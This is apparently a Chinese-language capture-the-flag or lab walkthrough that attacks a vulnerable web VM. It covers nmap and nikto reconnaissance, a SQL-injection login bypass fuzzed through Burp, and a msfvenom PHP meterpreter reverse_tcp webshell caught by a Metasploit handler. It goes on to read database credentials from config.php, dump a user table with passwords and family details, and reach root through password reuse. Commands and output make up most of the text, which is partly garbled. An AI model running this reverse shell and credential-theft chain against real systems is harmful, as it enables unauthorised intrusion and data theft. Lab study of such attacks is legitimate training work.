信息探测
扫描主机服务信息以及服务版本
nmap -sV靶场1P地址
快速扫描主机全部信息
–nmap -T4 -A -v 靶场IP地址
探测目录信息
–nikto -host http://靶场IP地址端口
-dirb http://靶场IP地址:端口
利用弱点
–登录界面是否存在sQL注入
–敏感信息是否泄漏
已知漏洞
–backup.zipf等等
http://192.168.253.13/login.php
绕过登录认证机制
查看登录页面源代码;利用burpsuite进行fuzz测试,绕过登录验证机制。
web模糊测试字典位置/usr/share/wordlists/wfuzz
渗透测试技巧
–查看burpsuite中Introder模块中返回值得不同,区分不同响应
-对于绕过认证机制,需要查看源代码,挖掘是否存在is验证
rootakali:-# cd /usr/share/wordlists/wfuzz
[email protected]:/usr/share/wordlists/wfuzz# ls
general Injections others stress vulns webservices
rootakali:/usr/share/wordlists/wfuzz# cd Injections/
rootakali:/usr/share/wordlists/wfuzz/Injections# ls
All attack.txt bad chars.txt SQL.txt Traversal.txt XML.txt xss.txt rootakali:/usr/share/wordlists/wfuzz/Injections# cp SQL.txt /root/Desktop/SQL.txt [email protected]:/usr/share/wordtists/wfuzz/Injections# ls
Alt attack.txt bad chars.txt SQL.txt
rootakali:/usr/share/wordLists/wfuzz/Injections# cd /root/Desktop/
rootakali:-/Desktop# ls SQL.txt
http://burp/show/2/3wnsf8zj678dcofwąkfrkmg 1uyfoc31
http://192.168.1.9/personel.php
生成webshell
启用metasploit监听
msf > use exploit/multi/handler
msf exploit(handler)> set payload php/meterpreter/reverse_tcp
msf exploit(handler)> set lhost攻击机P地址
msf exploit(handler)> set lport 4444
msf exploit(handler)> run
生成shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机P地址 lport=4444-f raw >/root/Desktop/shell.php
http://192.168.1.9/uploads/
meterpreter > ls
meterpreter > cd …
meterpreter > ls -al
Listing: /var/www/html
100644/rw-r–r-- 356 fil 2017-03-20 18:17:54 +0800 config.php
100644/rw-r–r-- 856 fil 2017-04-28 21:11:06 +0800 gonder.php
100644/rw-r–r-- 9311 fil 2017-04-28 21:12:24 +0800 hakkimizda.php
100644/rw-r–r-- 796 fil 2017-03-23 18:33:05 +0800 index.php
100644/rw-r–r-- 4561 fil 2017-04-28 21:16:59 +0800 login.php
100644/rw-r–r-- 3517 fil 2017-05-03 23:54:37 +0800 personel.php
100644/rw-r–r-- 2143 fil 2017-04-28 21:14:40 +0800 sorgu.php
40777/rwxrwxrwx 4096 dir 2020-04-24 18:12:02 +0800 uploads
meterpreter > cat config.php
<?php ///////////////////////////////////////////////////////////////////////////////////////// $con=mysqli_connect("localhost","root","toor","deneme"); if (mysqli_connect_errno()) { echo "Mysql Ba?lant? hatas?!: " . mysqli_connect_error(); } ///////////////////////////////////////////////////////////////////////////////////////// ?>meterpreter > shell
python -c “import pty;pty.spawn(’/bin/bash’)”
[email protected]:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: toor
mysql>
mysql> show databases;
show databases;
±-------------------+
| Database |
±-------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
±-------------------+
4 rows in set (0.00 sec)
mysql> use deneme;
mysql> show tables;
show tables;
±-----------------+
| Tables_in_deneme |
±-----------------+
| user |
±-----------------+
mysql> select * from user;
select * from user;
±—±------------±-----------------±----------±--------±------------±--------±------------±-------------+
| ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
±—±------------±-----------------±----------±--------±------------±--------±------------±-------------+
| 1 | ismail kaya | [email protected] | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 |
| 2 | can demir | [email protected] | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 |
±—±------------±-----------------±----------±--------±------------±--------±------------±-------------+
2 rows in set (0.00 sec)
mysql> quit;
[email protected]:/var/www/html$ su - root
su - root
Password: asd123***
[email protected]:~# whoami
whoami
root
获取视频资料请加群